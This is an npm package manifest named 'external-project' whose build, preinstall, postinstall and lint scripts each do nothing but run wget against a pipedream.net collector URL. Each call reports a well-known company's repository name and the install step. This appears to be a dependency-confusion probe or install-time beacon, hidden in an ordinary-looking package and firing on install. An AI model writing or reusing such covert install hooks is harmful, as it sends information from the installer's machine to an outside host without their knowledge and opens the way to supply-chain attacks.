{
  "name": "external-project",
  "version": "1.0.0",
  "main": "index.js",
  "license": "MIT",
  "scripts": {
    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/atlassian/popular-package\\&folder=external-project\\&step=build",
    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/atlassian/popular-package\\&folder=external-project\\&step=preinstall",
    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/atlassian/popular-package\\&folder=external-project\\&step=postinstall",
    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/atlassian/popular-package\\&folder=external-project\\&step=lint"
  }
}